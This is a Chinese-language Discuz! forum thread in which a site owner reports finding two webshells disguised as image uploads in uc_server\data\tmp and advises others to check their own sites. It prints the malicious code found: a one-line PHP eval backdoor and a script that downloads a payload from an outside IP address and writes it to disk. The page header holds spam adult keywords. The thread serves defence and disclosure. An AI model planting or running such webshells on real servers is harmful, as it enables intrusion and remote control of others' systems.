97久久国产亚洲精品超碰热,成人又色又爽的免费网站,色偷偷女人的天堂a,男女高潮喷水在线观看,国内精品一线二线三线区别在哪里

Discuz! 官方交流社區(qū)

標題: uc_server\data\tmp被上傳木馬文件 建議自查 [打印本頁]

作者: onlygod    時間: 2019-11-14 16:53
標題: uc_server\data\tmp被上傳木馬文件 建議自查
(, 下載次數: 35)
今天網站搬家,順手用最新版的D盾掃描了一下,發(fā)現(xiàn)兩個可疑文件,圖片格式。

路徑為:uc_server\data\tmp

將格式圖片格式的后綴改為  .php,用記事本打開,發(fā)現(xiàn)一句話木馬,兩個文件分別如下:
  1. <?php @eval($_POST['1']);?>
復制代碼
  1. <script language="php"> $save=file_get_contents('http://103.198.194.134/php/xz.txt');  file_put_contents('a.php',$save) ;</script>
復制代碼
目前暫時沒掃出其他木馬,懷疑上傳木馬后并沒有成功執(zhí)行。

文件名分別為:
upload37372
upload29060

后面的數字應該是用戶ID,建議將圖片改成隨機數字命名,否則容易被黑客利用。
IIS的解析漏洞,配合這個,有可能能拿下webshell。

-------建議大家自查一下。  不知道新版有木有這個漏洞,知道的大神說下。


作者: 耗子    時間: 2019-11-14 17:43
這種情況一般都是頭像進來的, 做好防護措施  尤其服務器  廣告IIS有這個漏洞 包括  這個是PHP的漏洞




歡迎光臨 Discuz! 官方交流社區(qū) (http://r615.cn/) Powered by Discuz! X5.0